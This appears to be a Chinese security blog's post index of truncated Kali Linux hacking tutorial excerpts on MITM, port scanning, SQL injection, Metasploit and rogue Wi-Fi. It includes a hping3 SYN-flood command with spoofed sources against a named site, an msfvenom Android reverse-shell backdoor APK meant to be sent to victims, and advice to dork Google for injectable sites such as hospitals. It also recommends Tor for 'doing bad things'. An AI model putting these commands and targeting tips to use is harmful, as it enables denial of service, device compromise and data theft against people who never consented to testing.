2018/02/02 #阿里云kali源 deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb http://mirrors.aliyun.com/kali-security kali-rolling/updates main contrib non-free deb-src http://mirrors.aliyun.com/kali-security …
2017/04/09 最近读了一篇有关arp欺骗和中间人攻击的文章,于是乎就想着自己实现一下,顺便验证下微信在回话劫持后的安全性。
1.本机环境 Macbook Air:OS X 10.11 El Captain
2.推荐工具 Nmap(网络探测工具和安全/端口扫描器)
$ brew install nmap Ettercap(arp欺骗和dns欺骗工具)
$ brew install ettercap –with-gtk+ Driftnet(网络包图片解析器)
2017/04/08 DDoS攻击是常见的攻击方式,每小时大约发生28次。http://www.digitalattackmap.com提供在世界范围内的DDoS实时攻击分布图:
从DDoS攻击的地图上就可以看出国际形势;例如,到9月18号可以看到日本-中国的攻击;川普宣布建墙之后,可以看到墨西哥-美国的攻击。
使用hping3进行DoS攻击:
# hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source testsite.com -c:发送数据包的个数 -d:每个数据包的大小 -S:发送SYN数据包 -w:TCP window大小 -p:目标端口,你可 …
2017/04/08 nmap-Network Mapper,是著名的网络扫描和嗅探工具包。他同样支持Windows和OS X。
扫描开放端口和判断操作系统类型 先让我们ping一段地址范围,找到启动的主机:
# nmap -sP 159.203.205.0-100 使用SYN扫描探测操作系统类型: # nmap -sS 159.203.205.61 -O 扫描开放端口:
# nmap -sV 159.203.205.61 -A 扫描web服务器的网站目录 # nmap –script http-enum.nse blog.topspeedsnail.com 上面使用了脚本,存放路径 …
2017/04/08 Kali Linux默认并没有安装SSH服务,为了实现远程登录Kali Linux,我们需要安装SSH服务。
安装 OpenSSH Server # apt-get install openssh-server 配置SSH服务开机启动 # update-rc.d -f ssh remove # update-rc.d -f ssh defaults # update-rc.d -f ssh enable 2 3 4 5 更改默认的SSH密钥 # cd /etc/ssh # mkdir ssh_key_backup # mv ssh_host_* ssh_key_backup 创建新密钥: # …
2017/04/08 HTTrack可以克隆指定网站-把整个网站下载到本地。
可以用在离线浏览上,也可以用来收集信息(甚至有网站使用隐藏的密码文件)。
一些仿真度极高的伪网站(为了骗取用户密码),也是使用类似工具做的。
Kali Linux默认安装了HTTrack。
HTTrack帮助:
2017/04/08 你要做坏事时,最先应该想到匿名。扫描网站/主机,或利用漏洞;甚至在大天朝发帖都有风险,为了防止半夜鬼敲门,我们可以使用tor实现匿名。
如果你不知道tor是什么,看:https://zh.wikipedia.org/wiki/Tor ; https://program-think.blogspot.com/2013/11/tor-faq.html
图示:
在天朝也许要多加一层:
优点:
首先有了一个梯子 你的ISP提供商并不知道你在使用Tor,它也许知道你在使用代理 Tor的入口点并不知道你的IP地址,而是代理的ip地址;代理一定要可靠。 安装tor:
2017/04/08 sqlmap是开源的SQL注入自动攻击工具,它可以自动的探测SQL注入点并且进一步控制网站的数据库。
Kali Linux默认安装了这个工具。
找到潜在的攻击目标
第一步是找到有SQL注入漏洞的网站。如果你没有特定攻击目标,可以使用Google搜索 php?id=1 (或php?id= + xx系医院):
2017/04/08 Metasploit提供了很多辅助的模块,非常实用。今天介绍一个叫search_email_collector的模块,它的功能是查找搜索引擎(google、bing、yahoo),收集和某个域名有关的邮箱地址。
使用步骤: 启动msfconsole:
# service postgresql start # msfconsole 搜索模块:
2017/04/08 Lynis是Linux平台上的一款安全漏洞扫描工具。它可以扫描系统的安全漏洞、收集系统信息、安装的软件信息、配置问题、没有设置密码的用户和防火墙等等。
Lynis是流行可靠的安全扫描工具。
前不久,Lynis更新了版本,Lynis发布了2.2.0。在这个版本上增加了新的特性和一些小的功能提升。我建议使用Lynis的最新版本2.2.0。
2017/04/08 Metasploit可以在Linux、Windows和Mac OS X系统上运行。我假设你已安装了Metasploit,或者你使用的系统是Kali Linux。它有命令行接口也有GUI接口。
我使用的系统是Kali Linux,本文以这个系统为例。
图形用户界面接口:Armitage
2017/04/08 我使用Kali Linux的IP地址是192.168.0.112;在同一局域网内有一台运行Windows XP(192.168.0.108)的测试电脑。
本文演示怎么使用Metasploit入侵windows xp sp3。
启动msfconsole:
# msfconsole 选择一个漏洞:
2017/04/08 文本演示怎么使用Kali Linux入侵Android手机。
Kali Linux IP地址:192.168.0.112;接收连接的端口:443。
同一局域网内android手机一部(android 5.1)
创建一个后门程序 在终端中执行:
# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=443 > my_backdoor.apk 这个后门程序(APK)是发送给受害者的;要把上面命令的IP地址替换为攻击者IP,当后门程序运行时,它会试图连接这个IP。
2017/04/08 ettercap是执行ARP欺骗嗅探的工具,通常用它来施行中间人攻击。
我还介绍过另一个arp欺骗工具-arpspoof
我使用的是Kali Linux 2.0;在开始使用ettercap之前,先配置一下:
编辑配置文件/etc/ettercap/etter.conf:
2017/04/08 中间人攻击也叫Man-In-The-Middle-Attack。
我假设你已经知道中间人攻击的基本概念,引用一段wikipedia:
中间人攻击(Man-in-the-middle attack,缩写:MITM)是指攻击者与通讯的两端分别建立独立的联系,并交换其所收到的数据,使通讯的两端认为他们正在通过一个私密的连接与对方直接对话,但事实上整个会话都被攻击者完全控制。在中间人攻击中,攻击者可以拦截通讯双方的通话并插入新的内容。在许多情况下这是很简单的(例如,在一个未加密的Wi-Fi 无线接入点的接受范围内的中间人攻击者,可以将自己作为一个中间人插入这个网络)。
2017/04/08 集线器、交换机和路由器都是计算机网络设备,而且非常容易混淆。那么集线器、交换机和路由器有什么区别呢?
用简单的话说,就是智商高低。路由器最智能、集线器最傻。
集线器、交换机和路由器都允许你把一个或多个计算机连接到其他计算机、网络设备等。每个都有多个网络接口,允许你插入网线接入网络,但是内部原理不同。下面我们分别看一下这些设备。
2017/04/08 全世界,现在大约50%的网站没有使用SSL加密,天朝尤其多。
我们都知道通过HTTP发送的数据都是明文,没有使用任何加密,即使是在数据敏感的登录页面。
本文的目的是:如果你在不熟悉的网络环境中,要注意提高警惕。
没有人希望自己的密码暴露给他人,so,不要嗅探(狗)他人的密码。
2017/04/08 我这里使用的Kali Linux,它默认安装了WPScan。
在使用WPScan之前,先更新它的漏洞数据库:
# wpscan –update 扫描wordpress用户
wpscan -–url [wordpress网址] –-enumerate u 以我的网站为例:
# wpscan --url http://blog.topspeedsnail.com --enumerate u 注意:要用使用两个–,否则报错-“The WordPress URL supplied ‘http://rl/’ seems to be down.”
2017/04/08 Hydra是非常高效的网络登录破解工具,它可以对多种服务程序执行暴力破解(SSH、VNC等等)。
防止这种攻击其实很容易,方法很多。以SSH为例:
Ubuntu:使用Port Knocking隐藏SSH端口
在Ubuntu中用Fail2Ban保护SSH
CentOS 7安装使用Fail2Ban保护SSH
2017/04/08 本帖介绍怎么创建假的wifi热点,然后抓取连接到这个wifi用户的敏感数据。我们还会给周围的无线路由器发送未认证的包,使这些路由器瘫痪,强迫用户连接(或自动连接)我们创建的假wifi热点。
这种攻击也叫”水坑攻击”-把其他用户都聚集到一个”坑”中。